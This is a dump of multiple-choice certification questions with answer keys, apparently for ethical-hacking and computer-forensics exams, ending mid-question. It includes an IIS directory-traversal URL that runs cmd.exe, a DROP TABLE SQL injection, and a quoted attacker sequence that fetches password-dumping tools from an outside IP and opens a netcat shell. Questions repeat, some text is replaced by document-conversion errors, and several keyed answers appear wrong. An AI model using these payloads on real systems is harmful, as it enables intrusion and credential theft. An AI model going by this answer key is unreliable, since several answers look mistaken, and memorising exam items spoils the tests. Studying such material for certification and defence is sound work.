After passively scanning the network of Department of Defense (DoD), you switch over to active scanning to identify live hosts on their network. DoD is a lage organization and should respond to any number of scans. You start an ICMP ping sweep by sending an IP packet to the broadcast address. Only five hosts responds to your ICMP pings; definitely not the number of hosts you were expecting. Why did this ping sweep only produce a few responses?
A. A switched network will not respond to packets sent to the broadcast address
B. Only IBM AS/400 will reply to this scan
C. Only Unix and Unix-like systems will reply to this scan
D. Only Windows systems will reply to this scan
C

Meyer Electronics Systems just recently had a number of laptops stolen out of their office. On these laptops contained sensitive corporate information regarding patents and company strategies. A month after the laptops were stolen, a competing company was found to have just developed products that almost exactly duplicated products that Meyer produces. What could
have prevented this information from being stolen from the laptops?
A. SDW Encryption
B. EFS Encryption
C. DFS Encryption
D. IPS Encryption
B

How many possible sequence number combinations are there in TCP/IP protocol?
A. 320 billion
B. 32 million
C. 4 billion
D. 1 billion
C

George is the network administrator of a large Internet company on the west coast. Per corporate policy, none of the employees in the company are allowed to use FTP or SFTP programs without obtaining approval from the IT department. Few managers are using SFTP program on their computers. Before talking to his boss, George wants to have some proof of their activity.
George wants to use Ethereal to monitor network traffic, but only SFTP traffic to and from his network. What filter should George use in Ethereal?
A. src port 22 and dst port 22
B. src port 23 and dst port 23
C. net port 22
D. udp port 22 and host 172.16.28.1/24
A

Software firewalls work at which layer of the OSI model?
A. Transport
B. Application
C. Network
D. Data Link
D

Julia is a senior security analyst for Berber Consulting group. She is currently working on a contract for a small accounting firm in Florida. They have given her permission to perform social engineering attacks on the company to see if their in-house training did any good. Julia calls the main number for the accounting firm and talks to the receptionist. Julia says that she is an IT technician from the company's main office in Iowa. She states that she needs the receptionist's
network username and password to troubleshoot a problem they are having. Julia says that Bill Hammond, the CEO of the company, requested this information. After hearing the name of the CEO, the receptionist gave Julia all the information she asked for.
What principal of social engineering did Julia use?
A. Reciprocation
B. Friendship/Liking
C. Social Validation
D. Scarcity
A

Jessica works as systems administrator for a large electronics firm. She wants to scan her network quickly to detect live hosts by using ICMP ECHO Requests. What type of scan is Jessica going to perform?
A. Ping trace
B. Tracert
C. Smurf scan
D. ICMP ping sweep
D

John is using Firewalk to test the security of his Cisco PIX firewall. He is also utilizing a sniffer located on a subnet that resides deep inside his network. After analyzing the sniffer log files, he does not see any of the traffic produced by Firewalk. Why is that?
A. Firewalk sets all packets with a TTL of zero
B. Firewalk cannot pass through Cisco firewalls
C. Firewalk sets all packets with a TTL of one
D. Firewalk cannot be detected by network sniffers
C

When you are running a vulnerability scan on a network and the IDS cuts off your connection, what type of IDS is being used?
A. NIPS
B. Passive IDS
C. Progressive IDS
D. Active IDS
D

As a security analyst you setup a false survey website that will require users to create a username and a strong password. You send the link to all the employees of the company. What information will you be able to gather?
A. The employees network usernames and passwords
B. The MAC address of the employees?computers
C. The IP address of the employees computers
D. Bank account numbers and the corresponding routing numbers
A

On Linux/Unix based Web servers, what privilege should the daemon service be run under?
A. You cannot determine what privilege runs the daemon service
B. Guest
C. Root
D. Something other than root
D

Terri works for a security consulting firm that is currently performing a penetration test on First National Bank in Tokyo. Terri's duties include bypassing firewalls and switches to gain access to the network. Terri sends an IP packet to one of the company's switches with ACK bit and the source address of her machine set. What is Terri trying to accomplish by sending this IP packet?
A. Enable tunneling feature on the switch
B. Trick the switch into thinking it already has a session with Terri's computer
C. Crash the switch with a DoS attack since switches cannot send ACK bits
D. Poison the switch's MAC address table by flooding it with ACK bits
B

You are running through a series of tests on your network to check for any security vulnerabilities. After normal working hours, you initiate a DoS attack against your external firewall. The firewall quickly freezes up and becomes unusable. You then initiate an FTP connection from an external IP into your internal network. The connection is successful even though you have FTP blocked at the external firewall. What has happened?
A. The firewall failed-open
B. The firewall failed-bypass
C. The firewall failed-closed
D. The firewall ACL has been purged
A

Kimberly is studying to be an IT security analyst at a vocational school in her town. The school offers many different programming as well as networking languages. What networking protocol language should she learn that routers utilize?
A. OSPF
B. BPG
C. ATM
D. UDP
A

Paul's company is in the process of undergoing a complete security audit including logical and physical security testing. After all logical tests were performed; it is now time for the physical round to begin. None of the employees are made aware of this round of testing. The security-auditing firm sends in a technician dressed as an electrician. He waits outside in the lobby for some employees to get to work and follows behind them when they access the restricted areas. After
entering the main office, he is able to get into the server room telling the IT manager that there is a problem with the outlets in that room. What type of attack has the technician performed?
A. Fuzzing
B. Tailgating
C. Man trap attack
D. Backtrapping
B

John and Hillary works at the same department in the company. John wants to find out Hillary's network password so he can take a look at her documents on the file server. He enables Lophtcrack program to sniffing mode. John sends Hillary an email with a link to Error! Reference source not found.
What information will he be able to gather from this?
A. The SAM file from Hillary computer
B. Hillary network username and password hash
C. The SID of Hillary network account
D. The network shares that Hillary has permissions
B

James is testing the ability of his routers to withstand DoS attacks. James sends ICMP ECHO requests to the broadcast address of his network. What type of DoS attack is James testing against his network?
A. Fraggle
B. SYN flood
C. Trinoo
D. Smurf
D

You work as an IT security auditor hired by a law firm in Boston to test whether you can gain access to sensitive information about the company's clients. You have rummaged through their trash and found very little information. You do not want to set off any alarms on their network, so you plan on performing passive footprinting against their Web servers. What tool should you use?
A. Ping sweep
B. Netcraft
C. Dig
D. Nmap
B

Harold is a security analyst who has just run the rdisk /s command to grab the backup SAM file on a computer. Where should Harold navigate on the computer to find the file?
A. %systemroot%\LSA
B. %systemroot%\repair
C. %systemroot%\system32\drivers\etc
D. %systemroot%\system32\LSA
B

What is kept in the following directory? HKLM\SECURITY\Policy\Secrets
A. Service account passwords in plain text
B. Cached password hashes for the past 20 users
C. IAS account names and passwords
D. Local store PKI Kerberos certificates
A

Michael works for Kimball Construction Company as senior security analyst. As part of yearly security audit, Michael scans his network for vulnerabilities. Using Nmap, Michael conducts XMAS scan and most of the ports scanned do not give a response. In what state are these ports?
A. Open
B. Stealth
C. Closed
D. Filtered
A

Harold is a security analyst who has just run the rdisk /s command to grab the backup SAM file on a computer. Where should Harold navigate on the computer to find the file?
A. %systemroot%\system32\drivers\etc
B. %systemroot%\repair
C. %systemroot%\LSA
D. %systemroot%\system32\LSA
B

You just passed your ECSA exam and are about to start your first consulting job running security audits for a financial institution in Los Angeles. The IT manager of the company you will be working for tries to see if you remember your ECSA class. He asks about the methodology you will be using to test the company's network. How would you answer?
A. IBM Methodology
B. LPT Methodology
C. Google Methodology
D. Microsoft Methodology
B

What will the following URL produce in an unpatched IIS Web Server?
http://www.thetargetsite.com/scripts/..%co%af../..%co%af../windows/system32/cmd.exe?/c+dir+c:\
A. Execute a buffer flow in the C: drive of the web server
B. Insert a Trojan horse into the C: drive of the web server
C. Directory listing of the C:\windows\system32 folder on the web server
D. Directory listing of C: drive on the web server
D

You setup SNMP in multiple offices of your company. Your SNMP software manager is not receiving data from other offices like it is for your main office. You suspect that firewall changes are to blame. What ports should you open for SNMP to work through Firewalls (Select 2)
A. 162
B. 160
C. 161
D. 163
A,C

What will the following command produce on a website login page?
SELECT email, passwd, login_id, full_name
FROM members
WHERE email = 'someone@somehwere.com'; DROP TABLE members; --'
A. Inserts the Error! Reference source not found. email address into the members table
B. Retrieves the password for the first user in the members table
C. Deletes the entire members table
D. This command will not produce anything since the syntax is incorrect
C

Frank is working on a vulnerability assessment for a company on the West coast. The company hired Frank to assess its network security through scanning, pen tests, and vulnerability assessments. After discovering numerous known vulnerabilities detected by a temporary IDS he set up, he notices a number of items that show up as unknown but questionable in the logs. He looks up the behavior on the Internet, but cannot find anything related. What organization should
Frank submit the log to find out if it is a new vulnerability or not?
A. RIPE
B. CVE
C. IANA
D. APIPA
B

Bill is the accounting manager for Grummon and Sons LLC in Chicago. On a regular basis, he needs to send PDF documents containing sensitive information through E-mail to his customers. Bill protects the PDF documents with a password and sends them to their intended recipients. Why PDF passwords do not offer maximum protection?
A. PDF passwords can easily be cracked by software brute force tools
B. PDF passwords are not considered safe by Sarbanes-Oxley
C. PDF passwords are converted to clear text when sent through E-mail
D. When sent through E-mail, PDF passwords are stripped from the document completely
A

You are the network administrator for a small bank in Dallas, Texas. To ensure network security, you enact a security policy that requires all users to have 14 character passwords. After giving your users 2 weeks notice, you change the Group Policy to force 14 character passwords. A week later you dump the SAM database from the standalone server and run a password-cracking tool against it. Over 99% of the passwords are broken within an hour. Why were these passwords cracked so quickly?
A. Networks using Active Directory never use SAM databases so the SAM database pulled was
empty
B. Passwords of 14 characters or less are broken up into two 7-character hashes
C. The passwords that were cracked are local accounts on the Domain Controller
D. A password Group Policy change takes at least 3 weeks to completely replicate throughout a
network
B

In Linux, what is the smallest possible shellcode?
A. 800 bytes
B. 8 bytes
C. 80 bytes
D. 24 bytes
D

After passing her CEH exam, Carol wants to ensure that her network is completely secure. She implements a DMZ, statefull firewall, NAT, IPSEC, and a packet filtering firewall. Since all security measures were taken, none of the hosts on her network can reach the Internet. Why is that?
A. Statefull firewalls do not work with packet filtering firewalls
B. NAT does not work with statefull firewalls
C. NAT does not work with IPSEC
D. IPSEC does not work with packet filtering firewalls
C

At what layer of the OSI model do routers function on?
A. 5
B. 1
C. 4
D. 3
D

What is the target host IP in the following command?
A. Firewalk does not scan target hosts
B. 172.16.28.95
C. This command is using FIN packets, which cannot scan target hosts
D. 10.10.150.1
B

You setup SNMP in multiple offices of your company. Your SNMP software manager is not receiving data from other offices like it is for your main office. You suspect that firewall changes are to blame. What ports should you open for SNMP to work through Firewalls (Select 2)
A. 162
B. 160
C. 163
D. 161
A,D

What are the security risks of running a "repair" installation for Windows XP?
A. Pressing Shift+F10 gives the user administrative rights
B. Pressing Ctrl+F10 gives the user administrative rights
C. There are no security risks when running the "repair" installation for Windows XP
D. Pressing Shift+F1 gives the user administrative rights
A

What will the following command produce on a website login page?
SELECT email, passwd, login_id, full_name
FROM members
WHERE email = 'someone@somehwere.com'; DROP TABLE members; --'
A. This command will not produce anything since the syntax is incorrect
B. Inserts the Error! Reference source not found. email address into the members table
C. Retrieves the password for the first user in the members table
D. Deletes the entire members table
D

You are trying to locate Microsoft Outlook Web Access Default Portal using Google search on the Internet. What search string will you use to locate them?
A. outlook:"search"
B. allinurl:"exchange/logon.asp"
C. locate:"logon page"
D. intitle:"exchange server"
B

If you come across a sheepdip machine at your client site, what would you infer?
A. Asheepdip coordinates several honeypots
B. Asheepdip computer is another name for a honeypot
C. Asheepdip computer is used only for virus-checking.
D. Asheepdip computer defers a denial of service attack
C

In a computer forensics investigation, what describes the route that evidence takes from the time you find it until the case is closed or goes to court?
A. rules of evidence
B. law of probability
C. chain of custody
D. policy of separation
C

How many characters long is the fixed-length MD5 algorithm checksum of a critical system file?
A. 128
B. 64
C. 32
D. 16
C

You are using DriveSpy, a forensic tool and want to copy 150 sectors where the starting sector is 1709 on the primary hard drive. Which of the following formats correctly specifies these sectors?
A. 0:1000, 150
B. 0:1709, 150
C. 1:1709, 150
D. 0:1709-1858
B

A honey pot deployed with the IP 172.16.1.108 was compromised by an attacker . Given below is an excerpt from a Snort binary capture of the attack. Decipher the activity carried out by the attacker by studying the log. Please note that you are required to infer only what is explicit in the excerpt. (Note: The student is being tested on concepts learnt during passive OS fingerprinting, basic TCP/IP connection concepts and the ability to read packet signatures from a sniff dump.)
03/15-20:21:24.107053 211.185.125.124:3500 -> 172.16.1.108:111 TCP TTL:43 TOS:0×0
ID:29726 IpLen:20 DgmLen:52 DF **A*** Seq: 0x9B6338C5 Ack: 0x5820ADD0 Win: 0x7D78
TcpLen: 32 TCP Options (3) => NOP NOP TS: 23678634 2878772
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
03/15-20:21:24.452051 211.185.125.124:789 -> 172.16.1.103:111 UDP TTL:43 TOS:0×0
ID:29733 IpLen:20 DgmLen:84 Len: 64
01 0A 8A 0A 00 00 00 00 00 00 00 02 00 01 86 A0 ................ 00 00 00 02 00 00 00 03 00 00 00
00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 01 86 B8 00 00 00 01 ................
00 00 00 11 00 00 00 00 ........
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
03/15-20:21:24.730436 211.185.125.124:790 -> 172.16.1.103:32773 UDP TTL:43 TOS:0×0
ID:29781 IpLen:20 DgmLen:1104 Len: 1084 47 F7 9F 63 00 00 00 00 00 00 00 02 00 01 86 B8
A. The attacker has conducted a network sweep on port 111
B. The attacker has scanned and exploited the system using Buffer Overflow
C. The attacker has used a Trojan on port 32773
D. The attacker has installed a backdoor
A

The newer Macintosh Operating System is based on:
A. OS/2
B. BSD Unix
C. Linux
D. Microsoft Windows
B

Before you are called to testify as an expert, what must an attorney do first?
A. engage in damage control
B. prove that the tools you used to conduct your examination are perfect
C. read your curriculum vitae to the jury
D. qualify you as an expert witness
D

You are contracted to work as a computer forensics investigator for a regional bank that has four 30 TB storage area networks that store customer data. What method would be most efficient for you to acquire digital evidence from this network?
A. create a compressed copy of the file with DoubleSpace
B. create a sparse data copy of a folder or file
C. make a bit-stream disk-to-image file
D. make a bit-stream disk-to-disk file
C

You are working for a large clothing manufacturer as a computer forensics investigator and are called in to investigate an unusual case of an employee possibly stealing clothing designs from the company and selling them under a different brand name for a different company. What you discover during the course of the investigation is that the clothing designs are actually original products of the employee and the company has no policy against an employee selling his own
designs on his own time. The only thing that you can find that the employee is doing wrong is that his clothing design incorporates the same graphic symbol as that of the company with only the wording in the graphic being different. What area of the law is the employee violating?
A. trademark law
B. copyright law
C. printright law
D. brandmark law
A

What type of attack occurs when an attacker can force a router to stop forwarding packets by flooding the router with many open connections simultaneously so that all the hosts behind the router are effectively disabled?
A. digital attack
B. denial of service
C. physical attack
D. ARP redirect
B

When examining a file with a Hex Editor, what space does the file header occupy?
A. the last several bytes of the file
B. the first several bytes of the file
C. none, file headers are contained in the FAT
D. one byte at the beginning of the file
D

In the context of file deletion process, which of the following statement holds true?
A. When files are deleted, the data is overwritten and the cluster marked as available
B. The longer a disk is inuse, the less likely it is that deleted files will be overwritten
C. While booting, the machine may create temporary files that can delete evidence
D. Secure delete programs work by completely overwriting the file in one go
C,D

A suspect is accused of violating the acceptable use of computing resources, as he has visited adult websites and downloaded images. The investigator wants to demonstrate that the suspect did indeed visit these sites. However, the suspect has cleared the search history and emptied the cookie cache. Moreover, he has removed any images he might have downloadeD. What can the investigator do to prove the violation? Choose the most feasible option.
A. Image the disk and try to recover deleted files
B. Seek the help of co-workers who are eye-witnesses
C. Check the Windows registry for connection data (You may or may not recover)
D. Approach the websites for evidence
A

A (n) ____________ is one thats performed by a computer program rather than the attacker manually performing the steps in the attack sequence.
A. blackout attack
B. automated attack
C. distributed attack
D. central processing attack
B

The offset in a hexadecimal code is:
A. The last byte after the colon
B. The 0x at the beginning of the code
C. The 0x at the end of the code
D. The first byte after the colon
B

It takes _____________ mismanaged case/s to ruin your professional reputation as a computer forensics examiner?
A. by law, three
B. quite a few
C. only one
D. at least two
C

With the standard Linux second extended file system (Ext2fs), a file is deleted when the inode internal link count reaches ________.
A. 0
B. 10
C. 100
D. 1
A

When examining the log files from a Windows IIS Web Server, how often is a new log file created?
A. the same log is used at all times
B. a new log file is created everyday
C. a new log file is created each week
D. a new log is created each time the Web Server is started
A

Which part of the Windows Registry contains the users password file?
A. HKEY_LOCAL_MACHINE
B. HKEY_CURRENT_CONFIGURATION
C. HKEY_USER
D. HKEY_CURRENT_USER
A

An employee is attempting to wipe out data stored on a couple of compact discs (CDs) and digital video discs (DVDs) by using a large magnet. You inform him that this method will not be effective in wiping out the data because CDs and DVDs are ______________ media used to store large amounts of data and are not affected by the magnet.
A. logical
B. anti-magnetic
C. magnetic
D. optical
D

Lance wants to place a honeypot on his network. Which of the following would be your recommendations?
A. Use a system that has a dynamic addressing on the network
B. Use a system that is not directlyinteracing with the router
C. Use it on a system in an external DMZ in front of the firewall
D. It doesnt matter as all replies are faked
D

What does the acronym POST mean as it relates to a PC?
A. Primary Operations Short Test
B. Power On Self Test
C. Pre Operational Situation Test
D. Primary Operating System Test
B

Paula works as the primary help desk contact for her company.Paula has just received a call from a user reporting that his computer just displayed a Blue Screen of Death screen and he can no longer work. Paula walks over to the users computer and sees the Blue Screen of Death screen.The users computer
is running Windows XP, but the Blue Screen looks like a familiar one that Paula had seen on Windows 2000
computers periodically. The user said he stepped away from his computer for only 15 minutes and when he got back, the Blue Screen was there.Paula also noticed that the hard drive activity light was flashing, meaning that the computer was processing something.Paula knew this should not be the case since the computer should be completely frozen during a Blue Screen. She checks the network IDS live log entries and notices numerous nmap scan alerts.
What is Paula seeing happen on this computer?
A. Paulas network was scanned using Floppyscan
B. There was IRQ conflict in Paulas PC
C. Paulas network was scanned using Dumpsec
D. Tools like Nessus will cause BSOD
A

What is the advantage in encrypting the communication between the agent and the monitor in an Intrusion Detection System?
A. Encryption of agent communications will conceal the presence of the agents
B. Alerts are sent to the monitor when a potential intrusion is detected
C. An intruder could intercept and delete data or alerts and the intrusion can go undetected
D. The monitor will know if counterfeit messages are being generated because they will not be
encrypted
D

Which legal document allows law enforcement to search an office, place of business, or other locale for evidence relating to an alleged crime?
A. bench warrant
B. wire tap
C. subpoena
D. search warrant
D

You are working as an investigator for a corporation and you have just received instructions from your manager to assist in the collection of 15 hard drives that are part of an ongoing investigation.
Your job is to complete the required evidence custody forms to properly document each piece of evidence as it is collected by other members of your team. Your manager instructs you to complete one multi-evidence form for the entire case and a single-evidence form for each hard drive. How will these forms be stored to help preserve the chain of custody of the case?
A. All forms should be placed in an approved secure container because they are now primary evidence in the case.
B. The multi-evidence form should be placed in the report file and the single-evidence forms should be kept with each hard drive in an approved secure container.
C. The multi-evidence form should be placed in an approved secure container with the hard drives and the single-evidence forms should be placed in the report file.
D. All forms should be placed in the report file because they are now primary evidence in the case.
B

The MD5 program is used to:
A. wipe magnetic media before recycling it
B. make directories on a evidence disk
C. view graphics files on an evidence drive
D. verify that a disk is not altered when you examine it
D

Which is a standard procedure to perform during all computer forensics investigations?
A. with the hard drive removed from the suspect PC, check the date and time in the systems CMOS
B. with the hard drive in the suspect PC, check the date and time in the File Allocation Table
C. with the hard drive removed from the suspect PC, check the date an d time in the systems RAM
D. with the hard drive in the suspect PC, check the date and time in the systems CMOS
A

E-mail logs contain which of the following information to help you in your investigation? (Select up to 4)
A. user account that was used to send the account
B. attachments sent with the e-mail message
C. unique message identifier
D. contents of the e-mail message
E. date and time the message was sent
A,C,D,E

In a forensic examination of hard drives for digital evidence, what type of user is most likely to have the most file slack to analyze?
A. one who has NTFS 4 or 5 partitions
B. one who uses dynamic swap file capability
C. one who uses hard disk writes on IRQ 13 and 21
D. one who has lots of allocation units per block or cluster
D

In what way do the procedures for dealing with evidence in a criminal case differ from the procedures for dealing with evidence in a civil case?
A. evidence must be handled in the same way regardless of the type of case
B. evidence procedures are not important unless you work for a law enforcement agency
C. evidence in a criminal case must be secured more tightly than in a civil case
D. evidence in a civil case must be secured more tightly than in a criminal case
C

You are assigned to work in the computer forensics lab of a state police agency. While working on a high profile criminal case, you have followed every applicable procedure, however your boss is still concerned that the defense attorney might question weather evidence has been changed while at the laB. What can you do to prove that the evidence is the same as it was when it first entered the lab?
A. make an MD5 hash of the evidence and compare it with the original MD5 hash that was taken
when the evidence first entered the lab
B. make an MD5 hash of the evidence and compare it to the standard database developed by NIST
C. there is no reason to worry about this possible claim because state labs are certified
D. sign a statement attesting that the evidence is the same as it was when it entered the lab
A

Study the log given below and answer the following question: Apr 24 14:46:46 [4663]:
spp_portscan: portscan detected from 194.222.156.169 Apr 24 14:46:46 [4663]: IDS27/FIN Scan:
194.222.156.169:56693 -> 172.16.1.107:482 Apr 24 18:01:05 [4663]: IDS/DNS-version-query:
212.244.97.121:3485 -> 172.16.1.107:53 Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval:
194.222.156.169:1425 -> 172.16.1.107:21 Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN
DETECTED from 24.9.255.53 Apr 25 02:08:07 [5875]: IDS277/DNS-version-query:
63.226.81.13:4499 -> 172.16.1.107:53 Apr 25 02:08:07 [5875]: IDS277/DNS-version-query:
63.226.81.13:4630 -> 172.16.1.101:53 Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query:
212.251.1.94:642 -> 172.16.1.107:111 Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard:
198.173.35.164:4221 -> 172.16.1.107:80 Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer:
38.31.107.87:2291 -> 172.16.1.101:53 Apr 26 06:43:05 [6283]: IDS181/nops-x86:
63.226.81.13:1351 -> 172.16.1.107:53 Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session
opened for user simple by (uid=0) Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session
opened for user simon by simple(uid=506) Apr 26 06:45:34 [6283]: IDS175/socks-probe:
24.112.167.35:20 -> 172.16.1.107:1080 Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect:
172.16.1.107:23 -> 213.28.22.189:4558 Precautionary measures to prevent this attack would
include writing firewall rules. Of these firewall rules, which among the following would be appropriate?
A. Disallow UDP53 in from outside to DNS server
B. Allow UDP53 in from DNS server to outside
C. Disallow TCP53 in from secondaries or ISP server to DNS server
D. Block all UDP traffic
A

When monitoring for both intrusion and security events between multiple computers, it is essential that the computers clocks are synchronized. Synchronized time allows an administrator to reconstruct what took place during an attack against multiple computers. Without synchronized time, it is very difficult to determine exactly when specific events took place, and how events interlace. What is the name of the service used to synchronize time among multiple computers?
A. Universal Time Set
B. Network Time Protocol
C. SyncTime Service
D. Time-Sync Protocol
B

When investigating a potential e-mail crime, what is your first step in the investigation?
A. Trace the IP address to its origin
B. Write a report
C. Determine whether a crime was actually committed
D. Recover the evidence
A

If a suspect computer is located in an area that may have toxic chemicals, you must:
A. coordinate with the HAZMAT team
B. determine a way to obtain the suspect computer
C. assume the suspect machine is contaminated
D. do not enter alone
A

The following excerpt is taken from a honeypot log. The log captures activities across three days. There are several intrusion attempts; however, a few are successful. (Note: The objective of this question is to test whether the student can read basic information from log entries and interpret the nature of attack.)
Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169
Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482 Apr 24
18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53 Apr 24
19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21 Apr 25
08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53 Apr 25 02:08:07
[5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53 Apr 25 02:08:07
[5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53 Apr 25 02:38:17
[5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111 Apr 25 19:37:32 [5875]:
IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80 Apr 26 05:45:12 [6283]:
IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53 Apr 26 06:43:05 [6283]:
IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53 Apr 26 06:44:25 victim7
PAM_pwdb[12509]: (login) session opened for user simple by (uid=0) Apr 26 06:44:36 victim7
PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506) Apr 26 06:45:34
[6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080 Apr 26 06:52:10 [6283]:
IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558 From the options given
below choose the one which best interprets the following entry: Apr 26 06:43:05 [6283]:
IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
A. An IDS evasion technique
B. A buffer overflow attempt
C. A DNS zone transfer
D. Data being retrieved from 63.226.81.13
A

What happens when a file is deleted by a Microsoft operating system using the FAT file system?
A. only the reference to the file is removed from the FAT
B. the file is erased and cannot be recovered
C. a copy of the file is stored and the original file is erased
D. the file is erased but can be recovered
A

The following excerpt is taken from a honeypot log that was hosted at laB. wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD. EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which
results in the commands run as shown below.
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo
haxedj00 >>ftpcom"
"cmd1.exe /c echo get n
C.
exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"

"cmd1.exe /c ftps:ftpcom"
"cmd1.exe /c nc
-l -p 6969 -
e cmd1.exe"
What can you infer from the exploit given?
A. It is a local exploit where the attacker logs in using username johna2k
B. There are two attackers on the system -johna2k and haxedj00
C. The attack is a remote exploit and the hacker downloads three files
D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port
C

When reviewing web logs, you see an entry for resource not found in the HTTP status code file. What is the actual error code that you would see in the log for resource not found?
A. 202
B. 404
C. 505
D. 909
B

You are called in to assist the police in an investigation involving a suspected drug dealer. The suspects house was searched by the police after a warrant was obtained and they located a floppy disk in the suspects bedroom. The disk contains several files, but they appear to be password protected. What are two common methods used by password cracking software that you can use to obtain the password?
A. Limited force and library attack
B. Brute Force and dictionary Attack
C. Maximum force and thesaurus Attack
D. Minimum force and appendix Attack
B

When examining a hard disk without a write-blocker, you should not start windows because Windows will write data to the:
A. Recycle Bin
B. MSDOS.sys
C. BIOS
D. Case files
A

An Employee is suspected of stealing proprietary information belonging to your company that he had no rights to possess. The information was stored on the Employees Computer that was protected with the NTFS Encrypted File System (EFS) and you had observed him copy the files to a floppy disk just before leaving work for the weekend. You detain the Employee before he leaves the building and recover the floppy disks and secure his computer. Will you be able to break the
encryption so that you can verify that that the employee was in possession of the proprietary
information?
A. EFS uses a 128- bit key that cant be cracked, so you will not be able to recover the information
B. When the encrypted file was copied to the floppy disk, it was automatically unencrypted, so you can recover the information
C. The EFS Revoked Key Agent can be used on the Computer to recover the information
D. When the Encrypted file was copied to the floppy disk, the EFS private key was also copied to the floppy disk, so you can recover the information.
B

What type of file is represented by a colon (:) with a name following it in the Master File Table of NTFS disk?
A. A compressed file
B. A Data stream file
C. An encrypted file
D. A reserved file
B

In Microsoft file structures, sectors are grouped together to form:
A. Clusters
B. Drives
C. Bitstreams
D. Partitions
A

While working for a prosecutor, What do you think you should do if the evidence you found appears to be exculpatory and is not being released to the defense ?
A. Keep the information of file for later review
B. Destroy the evidence
C. Bring the information to the attention of the prosecutor, his or her supervisor or finally to the judge
D. Present the evidence to the defense attorney
C

When a file is deleted by Windows Explorer or through the MS-DOS delete command, the operating system inserts _______________ in the first letter position of the filename in the FAT database.
A. A Capital X
B. A Blank Space
C. The Underscore Symbol
D. The lowercase Greek Letter Sigma (s)
D

When you carve an image, recovering the image depends on which of the following skills?
A. Recognizing the pattern of the header content
B. Recovering the image from a tape backup
C. Recognizing the pattern of a corrupt file
D. Recovering the image from the tape backup
A

In General, ______________ Involves the investigation of data that can be retrieved from the hard disk or other disks of a computer by applying scientific methods to retrieve the data.
A. Network Forensics
B. Data Recovery
C. Disaster Recovery
D. Computer Forensics
D
(Explanation:

Topic 4, Volume D
)

When conducting computer forensic analysis, you must guard against ______________ So that you remain focused on the primary job and insure that the level of work does not increase beyond what was originally expected.
A. Hard Drive Failure
B. Scope Creep
C. Unauthorized expenses
D. Overzealous marketing
B

Which of the following is NOT a graphics file?
A. Picture1.tga
B. Picture2.bmp
C. Picture3.nfo
D. Picture4.psd
C

You have used a newly released forensic investigation tool, which doesnt meet the Daubert Test, during a case. The case has ended-up in court. What argument could the defense make to weaken your case?
A. The tool hasnt been tested by the International Standards Organization (ISO)
B. Only the local law enforcement should use the tool
C. The total has not been reviewed and accepted by your peers
D. You are not certified for using the tool
C

Windows identifies which application to open a file with by examining which of the following?
A. The File extension
B. The file attributes
C. The file Signature at the end of the file
D. The file signature at the beginning of the file
A

With Regard to using an Antivirus scanner during a computer forensics investigation, You should:
A. Scan the suspect hard drive before beginning an investigation
B. Never run a scan on your forensics workstation because it could change your systems
configuration
C. Scan your forensics workstation at intervals of no more than once every five minutes during an investigation
D. Scan your Forensics workstation before beginning an investigation
D

To make sure the evidence you recover and analyze with computer forensics software can be admitted in court, you must test and validate the software. What group is actively providing tools and creating procedures for testing and validating computer forensics software ?
A. Computer Forensics Tools and Validation Committee (CFTVC)
B. Association of Computer Forensics Software Manufactures (ACFSM)
C. National Institute of Standards and Technology (NIST)
D. Society for Valid Forensics Tools and Testing (SVFTT)
C

Bob has been trying to penetrate a remote production system for the past two weeks. This time however, he is able to get into the system. He was able to use the System for a period of three weeks. However law enforcement agencies were recording his every activity and this was later presented as evidence. The organization had used a Virtual Environment to trap Bob. What is a Virtual Environment?
A. A Honeypot that traps hackers
B. A system Using Trojaned commands
C. An environment set up after the user logs in
D. An environment set up before an user logs in
A

When investigating a network that uses DHCP to assign IP addresses, where would you look to determine which system (MAC address) had a specific IP address at a specific time?
A. on the individual computers ARP cache
B. in the Web Server log files
C. in the DHCP Server log files
D. there is no way to determine the specific IP address
C

You are called by an author who is writing a book and he wants to know how long the copyright for his book will last after he has the book published?
A. 70 years
B. the life of the author
